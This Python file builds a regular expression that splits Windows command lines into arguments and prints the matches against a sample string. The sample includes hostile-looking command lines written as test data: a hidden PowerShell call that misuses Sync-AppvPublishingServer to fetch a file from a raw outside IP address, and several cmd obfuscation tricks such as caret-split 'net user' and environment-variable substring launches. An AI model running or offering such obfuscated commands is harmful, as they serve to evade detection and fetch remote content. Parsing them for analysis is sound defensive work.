import re
# Doc: this regex splits a command line into its arguments.
#
# Details:
#   Each match is one argument. Argument delimiters fall into two categories:
#     whitespace delimiters : \t \n \r \v ' '
#         ',' is a delimiter in the Windows cmd but not in PowerShell;
#         it is not treated as a delimiter by this pattern.
#     quotation delimiters  : ' ` "
#
# Groups (numbered 1-6 in this order):
#   arg                   : each argument, quoted or not
#   arg_quote             : an argument enclosed in a matching pair of quotes
#   quote_delimiters      : the opening quote character (adjustable)
#   escape                : one character of a quoted argument, or a backslash
#                           together with the character that follows it
#   arg_whitespace        : an argument delimited by whitespace
#   whitespace_delimiters : whitespace delimiters (adjustable); it lives inside
#                           a negative lookahead, so it never holds a value
#
# The pattern was written for PCRE. Python's `re` rejects `(?<name>...)`,
# `(?P>name)` subroutine calls and lookahead conditionals, so here:
#   * named groups use `(?P<name>...)` and `\3` became `(?P=quote_delimiters)`;
#   * the conditional "if the next char is not a backslash take one char, else
#     take two" is spelled as two mutually exclusive alternatives;
#   * the two subroutine calls are inlined. When adjusting quote_delimiters or
#     escape, keep the inlined copies in arg_whitespace in sync.
#
# Related doc:
#   https://docs.microsoft.com/fr-fr/cpp/c-language/parsing-c-command-line-arguments?view=vs-2019
#   http://daviddeley.com/autohotkey/parameters/parameters.htm
regex = re.compile(
    r"""
    (?P<arg>
        (?P<arg_quote>
            (?P<quote_delimiters> " | ' | ` )
            (?:
                (?! (?P=quote_delimiters) )
                (?P<escape> (?!\\) [\x00-\xFF] | \\ [\x00-\xFF] )
            )*
            (?P=quote_delimiters)
        )
      |
        (?P<arg_whitespace>
            (?:
                (?! (?P<whitespace_delimiters> \s | $ ) | ["'`] )
                (?: (?!\\) [\x00-\xFF] | \\ [\x00-\xFF] )
            )+
        )
    )
    """,
    flags=re.MULTILINE | re.VERBOSE,
)
# Sample input scanned by `regex` below: adjacent string literals are
# concatenated into one multi-line text of command lines and edge cases.
# Real-world command lines with quoted paths and a PowerShell invocation:
test_str = ("\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe\" --type=renderer /prefetch:1 \"R:\\Coficine\\MCI\\01 Activités\\03 PARTICIPATIONS\\2 Sociétés\\1 Particip. actuelles\\Monello Productions\\03. Dossier client\\01. KYC\\Actionnariat\\Actionnariat - 2018-05-03.pdf\"\n\n"
"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer \\n;(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;Invoke-WebRequest -Uri http://209.97.141.246/ee/index_files/alert.css}\n\n"
# Everything after this marker is a hand-written edge case: empty quotes,
# backslash escapes, nested/adjacent quotes and leading/trailing spaces.
"\"UNIT TESTS :\"\n\n"
"''\n"
" arg0\\ \\ \\\\ \"arg1\\\"\\\"\" \"arg2\\\"\\\\\"\"arg3 \\\"\" 'arg4\"arg4\"' arg5 arg6 \n\n"
" space_bef_and_aft__arg0 arg1 arg2 arg3 \n"
"space_aft___________arg0 arg1 arg2 arg3 \n"
" space_bef__________arg0 arg1 arg2 arg3\n"
"nospace_____________arg0 arg1 arg2 arg3\n\n"
" multispace______________arg0 arg1 arg2 arg3 arg4 \n\n"
" C:\\ProgramData\\Anaconda3\\python.exe C:\\ProgramData\\Anaconda3\\cwp.py C:\\ProgramData\\Anaconda3 C:\\ProgramData\\Anaconda3\\python.exe C:\\ProgramData\\Anaconda3\\Scripts\\jupyter-notebook-script.py \"%USERPROFILE%/\" \n\n"
".\n\n"
# Backtick-quoted text with embedded double and single quotes.
"`echo `ls \"/tmp\"``'``'\n\n"
"1\"\"3\"4\"\n\n"
# cmd-style inputs: carets, %variable% expansions, pipes and '@' prefixes.
"n^e^t u^s^er\n\n"
"cmd /c \"set x=calc & echo %x% | cmd\"\n"
"cmd /c \"set x=c@alc & echo %x:@=mantvydas% | cmd\"\n\n"
"\\c \\\\ \\' \\\" '\\'\\'\\'\\'\\'\\'\\'\\\\' \n\n"
"'# this will take the C character from %programdata% and will launch the cmd prompt'\n"
"%programdata:~0,1%md \\c \"whatever\"\n\n"
"@cmd\n"
"set pSM \n"
"PSModulePath=C:\\Users\\mantvydas\\Documents\\WindowsPowerShell\\Modules;....\n\n"
"FOR /F \"tokens=7 delims=s\\\\\" %g IN ('set^|findstr PSM') do %g\n\n"
# ',' and ';' used in place of spaces between the tokens.
"cmd,/c;hostname\n\n\n\n\n\n")
# Print every argument found in the sample input, followed by the span and
# text of each capture group of that match.
matches = regex.finditer(test_str)
for match_num, match in enumerate(matches, start=1):
    print(f"Match {match_num} was found at {match.start()}-{match.end()}: {match.group()}")
    # Groups that did not take part in the match are reported as None with a
    # -1 start/end position.
    for group_num, group in enumerate(match.groups(), start=1):
        print(f"Group {group_num} found at {match.start(group_num)}-{match.end(group_num)}: {group}")
# Note: these code samples are automatically generated and are not guaranteed to work.
# If you find any syntax errors, feel free to submit a bug report.
# For a full regex reference for Python, please visit: https://docs.python.org/3/library/re.html